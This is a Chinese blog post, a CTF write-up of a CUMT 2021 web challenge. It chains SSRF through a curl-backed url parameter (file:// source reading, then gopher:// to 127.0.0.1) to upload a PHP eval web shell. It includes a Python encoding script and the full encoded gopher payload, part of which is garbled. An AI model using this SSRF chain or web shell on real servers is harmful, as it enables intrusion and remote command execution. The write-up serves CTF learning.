CUMT2021一道SSRF

最新推荐文章于 2022-04-24 23:01:39 发布
最新推荐文章于 2022-04-24 23:01:39 发布
阅读量178 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/flying_bird2019/article/details/115326333
版权

表面看起来是上传,其实是SSRF
在这里插入图片描述
首页给了提示,url参数查看flag.php,直接?url=flag.php啥也没有
想到用file://协议

在这里插入图片描述可查看源码

在这里插入图片描述再看一下主页的源码

在这里插入图片描述
这里可以看到有curl,因此想到是SSRF
分析flag.php源码,不能直接上传文件,需要跳转服务器的地址为127.0.0.1
而且$_SERVER[“REMOTE_ADDR”]无法伪造
结合主页,我们可以用curl支持的gopher协议让服务器给自己传一个post数据包,上传一个一句话
gopher协议在SSRF中应用
在这里插入图片描述
给出编码脚本,test的内容可以抓包获取

import urllib
import requests
test =\
"""
POST /flag.php HTTP/1.1
Host: 219.219.61.234:55555
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=--------865968816
Content-Length: 285
Origin: http://219.219.61.234:55555
Connection: close
Referer: http://219.219.61.234:55555/?url=file:///var/www/html/flag.php
Upgrade-Insecure-Requests: 1

----------865968816
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: application/octet-stream

<?php @eval($_POST['cmd']) ?>

----------865968816
Content-Disposition: form-data; name="Upload"

&#25552;&#20132;&#26597;&#35810;
----------865968816--
"""  
tmp = urllib.parse.quote(test)
new = tmp.replace('%0A','%0D%0A')
result = '_'+new
print(result)

结果:

_%0D%0APOST%20/flag.php%20HTTP/1.1%0D%0AHost%3A%20219.219.61.234%3A55555%0D%0AUser-Agent%3A%20Mozilla/5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A86.0%29%20Gecko/20100101%20Firefox/86.0%0D%0AAccept%3A%20textml%2Capplication/xhtml%2Bxml%2Capplication/xml%3Bq%3D0.9%2Cimage/webp%2C%2A/%2A%3Bq%3D0.8%0D%0AAccept-Language%3A%20zh-CN%2Czh%3Bq%3D0.8%2Czh-TW%3Bq%3D0.7%2Czh-HK%3Bq%3D0.5%2Cen-US%3Bq%3D0.3%2Cen%3Bq%3D0.2%0D%0AAccept-Encoding%3A%20gzip%2C%20deflate%0D%0AContent-Type%3A%20multipart/form-data%3B%20boundary%3D--------865968816%0D%0AContent-Length%3A%20285%0D%0AOrigin%3A%20http%3A//219.219.61.234%3A55555%0D%0AConnection%3A%20close%0D%0AReferer%3A%20http%3A//219.219.61.234%3A55555/%3Furl%3Dfile%3A///var/www/html/flag.php%0D%0AUpgrade-Insecure-Requests%3A%201%0D%0A%0D%0A----------865968816%0D%0AContent-Disposition%3A%20form-data%3B%20name%3D%22file%22%3B%20filename%3D%221.php%22%0D%0AContent-Type%3A%20application/octet-stream%0D%0A%0D%0A%3C%3Fphp%20%40eval%28%24_POST%5B%27cmd%27%5D%29%20%3F%3E%0D%0A%0D%0A----------865968816%0D%0AContent-Disposition%3A%20form-data%3B%20name%3D%22Upload%22%0D%0A%0D%0A%26%2325552%3B%26%2320132%3B%26%2326597%3B%26%2335810%3B%0D%0A----------865968816--%0D%0A

因为需要在首页中传参,因此还需要再次URL编码,这样curl gopher://…才是正确的格式
将上面的结果再次url编码

_%250D%250APOST%2520%2fflag.php%2520HTTP%2f1.1%250D%250AHost%253A%2520219.219.61.234%253A55555%250D%250AUser-Agent%253A%2520Mozilla%2f5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A86.0%2529%2520Gecko%2f20100101%2520Firefox%2f86.0%250D%250AAccept%253A%2520textml%252Capplication%2fxhtml%252Bxml%252Capplication%2fxml%253Bq%253D0.9%252Cimage%2fwebp%252C%252A%2f%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520multipart%2fform-data%253B%2520boundary%253D--------865968816%250D%250AContent-Length%253A%2520285%250D%250AOrigin%253A%2520http%253A%2f%2f219.219.61.234%253A55555%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A%2f%2f219.219.61.234%253A55555%2f%253Furl%253Dfile%253A%2f%2f%14%2f%e8%83%9c%e5%88%a9ar%2fwww%14%2f%e5%9b%9e%e5%a4%b4ml%2fflag.php%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250A%250D%250A----------865968816%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%25221.php%2522%250D%250AContent-Type%253A%2520application%2foctet-stream%250D%250A%250D%250A%253C%253Fphp%2520%2540eval%2528%2524_POST%255B%2527cmd%2527%255D%2529%2520%253F%253E%250D%250A%250D%250A----------865968816%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522Upload%2522%250D%250A%250D%250A%2526%252325552%253B%2526%252320132%253B%2526%252326597%253B%2526%252335810%253B%250D%250A----------865968816--%250D%250A

因为主页中源码为$_REQUEST[‘url’]
所以url参数也可post提交(get方法有长度限制)
因此最后的url参数为

url=gopher://127.0.0.1:80/_%250D%250APOST%2520%2fflag.php%2520HTTP%2f1.1%250D%250AHost%253A%2520219.219.61.234%253A55555%250D%250AUser-Agent%253A%2520Mozilla%2f5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A86.0%2529%2520Gecko%2f20100101%2520Firefox%2f86.0%250D%250AAccept%253A%2520textml%252Capplication%2fxhtml%252Bxml%252Capplication%2fxml%253Bq%253D0.9%252Cimage%2fwebp%252C%252A%2f%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520multipart%2fform-data%253B%2520boundary%253D--------865968816%250D%250AContent-Length%253A%2520285%250D%250AOrigin%253A%2520http%253A%2f%2f219.219.61.234%253A55555%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A%2f%2f219.219.61.234%253A55555%2f%253Furl%253Dfile%253A%2f%2f%14%2f%e8%83%9c%e5%88%a9ar%2fwww%14%2f%e5%9b%9e%e5%a4%b4ml%2fflag.php%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250A%250D%250A----------865968816%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%25221.php%2522%250D%250AContent-Type%253A%2520application%2foctet-stream%250D%250A%250D%250A%253C%253Fphp%2520%2540eval%2528%2524_POST%255B%2527cmd%2527%255D%2529%2520%253F%253E%250D%250A%250D%250A----------865968816%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522Upload%2522%250D%250A%250D%250A%2526%252325552%253B%2526%252320132%253B%2526%252326597%253B%2526%252335810%253B%250D%250A----------865968816--%250D%250A

有返回值说明上传成功
在这里插入图片描述
源码中$uploaddir="/var/www/html/";
因此直接访问/1.php即可,用一句话即可得到根目录下的flag

flying_bird2019
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2021 年 五一数学建模比赛 C 题
weixin_42141390的博客
06-06 2万+
文章目录第一问正态性检验代码与提问 本人专挑数据挖掘、机器学习和 NLP 类型的题目做,有兴趣也可以逛逛我的数据挖掘竞赛专栏。 如果本篇博文对您有所帮助,请不要吝啬您的点赞 ???? 赛题官网:http://51mcm.cumt.edu.cn/ 第一问 从题目可知,数据存在波动,波动分成两种: 正常波动:外界温度或者产量变化的波动,传感器误报,规律性、独立性、偶发性 非正常波动:生产过程中的不稳定因素,持续性、联动性 注意,正常波动中,有一个规律性,所以,正常波动是白噪声吗? 我们把没有持续性和联动性的
SSRF的一次浅学习(CTF-hub)
quan9i的博客
05-04 1083
网刃杯时签到题都没做出来,太菜了,特此来学习一下SSRF
SSRF漏洞详解(练习持续更新中)
m0_55854679的博客
08-23 869
概念 SSRF(Sever-Side Request Forgery: 服务器端请求伪造) 是一种由攻击者构造由服务器端发起请求的安全漏洞。一般情况下,SSRF漏洞攻击的目标是从外网无法访问的内网系统(因为由服务器端发起,所以能够请求到与外网隔离的内网系统) 形成原因 其形成的原因大都是由于服务器提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格的过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。例如:从指定URL地址获取网页内容,加载指定地址的图
ctf web方向与php学习记录25(SSRF续2)
这周末在做梦的博客
11-09 1317
一,文件上传 首先,http协议查看上传页面,然后file协议查看源码(详细请查看ctf web方向与php学习记录24)。 然后分析以下源码 其中,'REMOTE_ADDR’用于浏览当前页面的用户的 IP 地址。 那么只要上传的文件来源于127.0.0.1(即本机地址),则绕过第一个if。 <?php error_reporting(0); if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){ echo "Just View From 127.0.0.1
[2021强网杯青少年]ssrf+fpm
Huamang的博客
09-26 412
best_php <?php highlight_file(__FILE__); //like fpm? class Crawl{ public $url; function __construct($url){ if(substr($url,0,7)==="http://"){ $this->url = $url; }else{ $this->url = "http://127.0.0.1/"
CUMT2021一道关于session文件格式的题
flying_bird2019的博客
03-30 196
主页 查彩虹表得知是127.0.0.1的hash值 因此想到伪造XFF ‘Referer’: ‘127.0.0.1’, ‘X-Forwarded-For’: ‘127.0.0.1’, ‘X-Client-IP’: ‘127.0.0.1’ 再次请求后得到源码 <?php // l0g1n.php if(isset($_GET['a'])){ $a = "===CUMT===\n".$_GET['a']; }else{ die('please give me something!');
CUMT校赛一道php代码审计(绕过)
flying_bird2019的博客
03-30 671
EZ PHP <?php highlight_file(__FILE__); error_reporting(0); if (isset($_GET['tag'])){ $tag=$_GET['tag']; if ($tag==md5($tag)) echo "6啊继续.</br>"; else die("爬爬爬"); }else{ die(" "); } if (isset($_GET['num'])){ $
CUMT第一轮双月赛Web题解
0verWatch的博客
12-17 926
ez-upload 这个题目作为Web题的第一个题难度刚好,很基础的漏洞点,就考了个文件上传,上来直接用phtml就可以绕过,但是给出来的hint是.htaccess,可能是我非预期了? 菜刀链接获取flag Cve 参考了这篇文章:https://www.menzel3.fun/2018/08/02/Drupal%20CVE2018-7600/#代码执行现场 这是一个Drupal 7的cve...
CUMT数据库SQL实验
qq_50998958的博客
04-24 1203
代码不能运行可能是少空格或者word的锅?🤔 导入的表: 学院(学院代码,学院名称) 学生(学号,姓名,性别,学院代码) 教师(教师号,教师名,学院代码) 课程(课程号,课程名,学时) 学习(学号,课程号,教师号,成绩) 授课(教师号,课程号) 1.求选修了老师“王刚”开课课程且成绩在90分以上的学生姓名、课程名称和成绩;(姓名,课程名,成绩) select 姓名,课程名,成绩 from 学习,学生,课程,教师 where 教师.教师名="王刚" and 学习.成绩>90 and
CUMT2021算法导论OJ(python版).rar
11-16
CUMT2021算法导论OJ(python版).rar》是一个压缩包,包含的资源主要用于学习和实践算法,特别强调了Python语言的应用。这个资源可能出自中国矿业大学(CUMT)的一门课程,旨在帮助学生掌握算法基础,并通过在线判题...
CUMT微机原理练习题
08-23
CUMT微机原理的复习题
cumt.rar_cumt_opnet_拓扑图
09-23
《OPNET技术详解:基于cumt.rar_cumt_opnet_拓扑图的深入学习》 在信息技术领域,网络性能分析和模拟是至关重要的环节。OPNET(Optimized Network Engineering Tool)是一款强大的网络仿真与性能分析工具,广泛应用...
CUMT校园网自动登录.rar
04-24
【CUMT校园网自动登录】是中国矿业大学(CUMT)学生或教职员工为了解决频繁手动登录校园网认证问题而开发的一种自动化解决方案。这个压缩包包含了一个详细的使用教程文档(必读-CUMT校园网自动登录教程.docx)和可能...
合并分裂算法MATLAB代码 CUMT自主移动机器人作业
08-23
合并分裂算法MATLAB代码 CUMT自主移动机器人作业
matlab下载.pdf
07-14
matlab下载下载方式及注意事项
Android系统原理及开发要点详解-从入门到精通
07-13
Android系统原理及开发要点详解 Java4 Android视频教程 Android开发视频教学 从入门到精通 Android的软件管理器的开发教程视频 Android深入浅出_Android高端课程分享试听 JavaWeb Android系统的手机防盗软件的实现 Android开发入门与实战随书视频 视频列表.txt 0.0MB 开发入门与实战代码.rar 6.1MB 第9章 我来“广播”你的“意图”——Intent和Broadcast面对面.wmv 15.1MB 第8章 移动信息仓库——Android的数据存储操作之轻轻地我保护——SharedPreferences存储-2.wmv 0.6MB 第8章 移动信息仓库——Android的数据存储操作之轻轻地我保护——SharedPreferences存储-1.wmv 24.3MB 第8章 移动信息仓库——Android的数据存储操作之Android数据存储概述.wmv 57.7MB 第7章 良好的学习开端——Android基本组件介绍之友好地互动交流——对话框(Dialog)介绍与实例-2.wmv 7.
GESP等级认证 2024年6月 C++一级真题
最新发布
07-14
GESP等级认证 2024年6月 C++一级真题 从官网上刚刚下载下来的,题都是热乎的,这可是最新真题 大家看一看瞧一瞧,走过路过不要错过,免费下载,全篇无水印,不好用随便吐槽我! 涵盖选择题,判断题,编程题,基础知识多,满满的干货,非常建议下载!!!!! 萌新小白来做做题,复习巩固都很合适!
大学生创业计划书(35)三份资料.doc
07-14
大学生创业计划书(35)三份资料.doc
cumt网络安全实验
11-11
cumt网络安全实验是中国矿业大学(北京)开设的一门实践课程,旨在培养学生对网络安全领域的理论知识和实际操作技能。这门课程内容涵盖了网络攻防技术、安全漏洞挖掘、数据加密与解密、安全协议设计等方面的内容。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值